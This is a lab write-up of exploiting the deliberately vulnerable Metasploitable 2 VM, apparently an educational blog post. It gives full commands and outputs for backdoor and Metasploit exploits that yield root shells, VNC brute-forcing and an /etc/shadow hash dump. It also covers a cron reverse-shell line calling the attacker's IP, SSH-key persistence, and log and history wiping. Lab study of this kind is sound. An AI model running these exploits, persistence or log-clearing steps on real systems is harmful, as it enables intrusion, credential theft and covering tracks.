Metasploitable is a virtual machine that was intended to be vulnerable so you could test out some penetration tools and perform some common penetration techniques on it. What I will do is go through the 5 phases of a pentration test(except reconnaissance) and talk about some of the tools and type of exploits I used. Granted Metasploitable 2 has many other vulnerabilities, but I will only cover a few which will give you a good start on exploiting Metasploitable 2. Below are the IP addresses of my Kali and Metasploitable virtual machines.
Kali Linux Machine
Scanning and Enumeration
Scanning with nmap
Using nmap to do a version scan with OS detection shows the services and versions each service is running. According to nman the OS is running Linux 2.6.X as well.
root@kali:~# nmap -sV -O 192.168.182.150 -p1-65535 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-04 01:26 CST Nmap scan report for 192.168.182.150 Host is up (0.012s latency). Not shown: 65505 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open rmiregistry GNU Classpath grmiregistry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd 6697/tcp open irc Unreal ircd 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb) 37131/tcp open nlockmgr 1-4 (RPC #100021) 38108/tcp open unknown 53107/tcp open mountd 1-3 (RPC #100005) 54247/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:13:C8:C2 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Banner grabing (port 23)
This was very intersting! I was able to find out username and password credentials(msfadmin/msfadmin) just by a simple banner grab using telnet.
root@kali:~# telnet 192.168.182.150 Trying 192.168.182.150... Connected to 192.168.182.150. Escape character is '^]'. _ _ _ _ _ _ ____ _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) | | | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____| |_| Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started metasploitable login:
Banner grabbing port web server
Using netcat we found that the victim is running Apache httpd 2.2.8 ((Ubuntu) DAV/2). I also found out that getting on my web browser and connecting to http://192.168.182.150 I was able to find services like Damn Vulnerable Web App, Multillidae, phphMyAdmin, Wiki, and WebDAV, running on the victim machine as well as the username msfadmin and password msfadmin credentials to log in.
VNC on port 5900
On the nmap scan I saw that the victim was running VNC (protocol 3.3). I tried connecting to it but it requires a password to get it. I will brute-force my way in later in this pentest.
root@kali:~# vncviewer 192.168.182.150 Connected to RFB server, using protocol version 3.3 Performing standard VNC authentication Password: Reading password failed root@kali:~#
VSFTPD v2.3.4 Backdoor (Port 21)
According to nmap Metasploitable is running VSFTPD v2.3.4., which in 2011 this backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011. This backdoor was removed on July 3rd 2011. We are going to check to see if this server contains the backdoor. Enter any username you like and add “:)” at the end. You can use anything for the password. If the backdoor is there, then it will trigger without valid credentials. The login will hang after the password, which tells us that the FTP server is still processing the login attempt. If we use Netcat and connect to port 6200 we will get a root shell, which indicates the backdoor is present. Could also Metasploit framework for this exploit as well, located Here.
root@kali:~# ftp 192.168.182.150 Connected to 192.168.182.150. 220 (vsFTPd 2.3.4) Name (192.168.182.150:root): backdoor:) 331 Please specify the password. Password:
root@kali:~# nc 192.168.182.150 6200 whoami root id uid=0(root) gid=0(root) ls -l total 85 drwxr-xr-x 2 root root 4096 May 13 2012 bin drwxr-xr-x 4 root root 1024 May 13 2012 boot lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom drwxr-xr-x 13 root root 13800 Feb 4 00:27 dev drwxr-xr-x 95 root root 4096 Feb 4 00:30 etc drwxr-xr-x 6 root root 4096 Apr 16 2010 home drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server drwxr-xr-x 13 root root 4096 May 13 2012 lib drwx------ 2 root root 16384 Mar 16 2010 lost+found drwxr-xr-x 4 root root 4096 Mar 16 2010 media drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt -rw------- 1 root root 10147 Feb 4 00:30 nohup.out drwxr-xr-x 2 root root 4096 Mar 16 2010 opt dr-xr-xr-x 108 root root 0 Feb 4 00:27 proc drwxr-xr-x 13 root root 4096 Feb 4 00:30 root drwxr-xr-x 2 root root 4096 May 13 2012 sbin drwxr-xr-x 2 root root 4096 Mar 16 2010 srv drwxr-xr-x 12 root root 0 Feb 4 00:27 sys drwxrwxrwt 4 root root 4096 Feb 4 00:30 tmp drwxr-xr-x 12 root root 4096 Apr 27 2010 usr drwxr-xr-x 15 root root 4096 May 20 2012 var lrwxrwxrwx 1 root root 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
Java RMI Server Insecure Default Configuration Java Code Execution (Port 1099)
Searching for a java exploit, I stumbled across this on the Rapid7 Vulnerability & Exploit Database,.
This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.
What I did was use metasploit and load the module “exploit/multi/misc/java_rmi_server” and set the options up to run the exploit. What’s a bit different here is I set the payload to java/meterpreter/reverse_tcp before running the exploit.
msf > use exploit/multi/misc/java_rmi_server msf exploit(java_rmi_server) > show options Module options (exploit/multi/misc/java_rmi_server): Name Current Setting Required Description ---- --------------- -------- ----------- HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request RHOST yes The target address RPORT 1099 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_rmi_server) > set RHOST 192.168.182.150 RHOST => 192.168.182.150 msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(java_rmi_server) > show options Module options (exploit/multi/misc/java_rmi_server): Name Current Setting Required Description ---- --------------- -------- ----------- HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request RHOST 192.168.182.150 yes The target address RPORT 1099 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (java/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_rmi_server) > set LHOST 192.168.182.147 LHOST => 192.168.182.147 msf exploit(java_rmi_server) > exploit [*] Started reverse TCP handler on 192.168.182.147:4444 [*] Using URL: http://0.0.0.0:8080/boSyAV2fxhkfw [*] Local IP: http://192.168.182.147:8080/boSyAV2fxhkfw [*] Server started. [*] 192.168.182.150:1099 - Sending RMI Header... [*] 192.168.182.150:1099 - Sending RMI Call... [*] 192.168.182.150 java_rmi_server - Replied to request for payload JAR [*] Sending stage (45741 bytes) to 192.168.182.150 [*] Meterpreter session 1 opened (192.168.182.147:4444 -> 192.168.182.150:51250) at 2017-02-04 05:28:51 -0600 [*] Server stopped. meterpreter > getuid Server username: root meterpreter >
Ingreslock (Port 1524)
The ingreslock is used to lock parts of an Ingres database, however is it also used as a backdoor set by trojans to get into a system. A simple netcat connection is all we need to exploit this.
root@kali:~# nc 192.168.182.150 1524 root@metasploitable:/# id uid=0(root) gid=0(root) groups=0(root) root@metasploitable:/#
NFS Share misconfiguration (Port 2049)
NFS(Network File Share) is a service, in Unix, used to share resources across the network, however system admistrators need to pay attention because misconfiguring it could present a vulnerability like the one shown here. During the nmap scan it was shown that NFS was running on port 2049. Using the command showmount -e 192.168.182.150, I was able to discover that the root directory was being shared!! As you know, for sure I was going to exploit this vulnerability listed below.
Showing NFS server’s export list
root@kali:~# showmount -e 192.168.182.150 Export list for 192.168.182.150: / * root@kali:~#
Making a mount point in order to get view all the contents of the server. I also run the df -h command in order to show that we have access to the root directory of the server. In the post exploitation phase I will add a ssh key on the server’s authorized_keys file. More will be explained later in this guide.
root@kali:~# mkdir /temp/root_access2Metaploitable/ root@kali:~# mount -t nfs 192.168.182.150:/ /temp/root_access2Metaploitable/ -o nolock root@kali:~# df -h Filesystem Size Used Avail Use% Mounted on udev 10M 0 10M 0% /dev tmpfs 1.6G 9.1M 1.6G 1% /run /dev/sda1 57G 17G 38G 31% / tmpfs 3.9G 212K 3.9G 1% /dev/shm tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 3.9G 0 3.9G 0% /sys/fs/cgroup tmpfs 798M 8.0K 798M 1% /run/user/132 tmpfs 798M 12K 798M 1% /run/user/0 /dev/sr0 3.1G 3.1G 0 100% /media/cdrom0 192.168.182.150:/ 7.0G 1.5G 5.2G 22% /temp/root_access2Metaploitable
Bruteforcing Vncviewer Login Credentials (Port 5900)
Usinging Metasploit’s auxiliary module “auxiliary/scanner/vnc/vnc_login” I used it to brute-force the victim and get the password “password”. With this I was able to go back run vncviewer again with the correct credentials and not only get a GUI but also root shell into the system!
msf > use auxiliary/scanner/vnc/vnc_login msf auxiliary(vnc_login) > set RHOSTS 192.168.182.150 RHOSTS => 192.168.182.150 msf auxiliary(vnc_login) > run [*] 192.168.182.150:5900 - Starting VNC login sweep [!] No active DB -- Credential data will not be saved! [+] 192.168.182.150:5900 - LOGIN SUCCESSFUL: :password [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(vnc_login) >
root@kali:~# vncviewer 192.168.182.150 Connected to RFB server, using protocol version 3.3 Performing standard VNC authentication Password: Authentication successful Desktop name "root's X desktop (metasploitable:0)" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
UnrealIRCD 126.96.36.199 Backdoor Command Execution (Port 6667)
This module exploits a malicious backdoor that was added to the Unreal IRCD 188.8.131.52 download archive. This backdoor was present in the Unreal184.108.40.206.tar.gz archive between November 2009 and June 12th 2010. Lets use the Metasploit Framework with exploit/unix/irc/unreal_ircd_3281_backdoor module to exploit this backdoor.
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.182.150 RHOST => 192.168.182.150 msf exploit(unreal_ircd_3281_backdoor) > exploit [*] Started reverse TCP double handler on 192.168.182.147:4444 [*] Connected to 192.168.182.150:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo ce3SW1J9SQ4K3cOX; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "ce3SW1J9SQ4K3cOX\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.150:58533) at 2017-02-04 00:35:19 -0600 id uid=0(root) gid=0(root) whoami root
Getting the usernames and passwords from the Victim
When you have a reverse shell, you could use the cat command to show what the contents in the /etc/shadow file. This displays the hashes to the passwords to the usernames. With further investigation, you can tell that these are MD5(Unix) passwords.
root@metasploitable:/# cat /etc/shadow root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7::: daemon:*:14684:0:99999:7::: bin:*:14684:0:99999:7::: sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7::: sync:*:14684:0:99999:7::: games:*:14684:0:99999:7::: man:*:14684:0:99999:7::: lp:*:14684:0:99999:7::: mail:*:14684:0:99999:7::: news:*:14684:0:99999:7::: uucp:*:14684:0:99999:7::: proxy:*:14684:0:99999:7::: www-data:*:14684:0:99999:7::: backup:*:14684:0:99999:7::: list:*:14684:0:99999:7::: irc:*:14684:0:99999:7::: gnats:*:14684:0:99999:7::: nobody:*:14684:0:99999:7::: libuuid:!:14684:0:99999:7::: dhcp:*:14684:0:99999:7::: syslog:*:14684:0:99999:7::: klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7::: sshd:*:14684:0:99999:7::: msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7::: bind:*:14685:0:99999:7::: postfix:*:14685:0:99999:7::: ftp:*:14685:0:99999:7::: postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7::: mysql:!:14685:0:99999:7::: tomcat55:*:14691:0:99999:7::: distccd:*:14698:0:99999:7::: user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7::: service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7::: telnetd:*:14715:0:99999:7::: proftpd:!:14727:0:99999:7::: statd:*:15474:0:99999:7::: snmp:*:15480:0:99999:7::: root@metasploitable:/#
Enable a Cron Job to run every 5 minutes
Using the command below we can run a cron job to run every 5 minutes which would run Netcat to return us a root shell. Open /etc/crontab on the linux victim and pasting the line below to the end of the file. Exit and save the file and restart the cron service by entering service cron restart. Now all you have to do is set up a Netcat listener on your kali machine to pick up the shell.
*/5 * * * * root nc 192.168.182.147 12345 -e /bin/bash
This will setup the listener to grab the shell
nc -lvp 12345
Adding a SSH key on the Server for future use
Since we have access to the servers SSH keys, I will be generating my own ssh key using ssh-keygen and append it to Metasploitable’s authorized_keys file using the
cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys command.
root@kali:~# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: e7:89:5d:df:ec:86:ec:88:18:ab:7c:ea:67:d3:c7:49 root@kali The key's randomart image is: +---[RSA 2048]----+ | | | | | | | | | S . . | | = oE. o | | o.+o o..o| | . =+..+.o..| | .=*o........| +-----------------+ root@kali:~# cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys
We now have successfully authenticated to the server with the user root without needing a password. I could come back to this anytime now without password authentication.
root@kali:~# ssh email@example.com Last login: Sat Feb 4 15:56:27 2017 from 192.168.182.147 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ You have new mail. root@metasploitable:~# root@metasploitable:~# id uid=0(root) gid=0(root) groups=0(root) root@metasploitable:~# hostname metasploitable root@metasploitable:~#
Clear Event Logs
Either using kwrite, edit, vi, etc, open the file /var/log/messages. From there you can delete any entries related to when you compromised the system or delete all the entries if you like.
Clearing terminal history
You can clear your current session’s bash history using the command history -c
You can also remove .bash_history file on the victim’s machine to remove all the history as well.
Metasploitable provides us with common vulnerabilities and gives us a VM in which we can test some penetration techniques, however this is just a start to those interested in learning a bit about penetration testing. Later on I will exploit other vulnerable VMs located in Vulnhub and
Pentester Labs .
Note– I will continue to add more this guide with time. If you have any comments, questions, or any other topics you would want me to cover, let me know.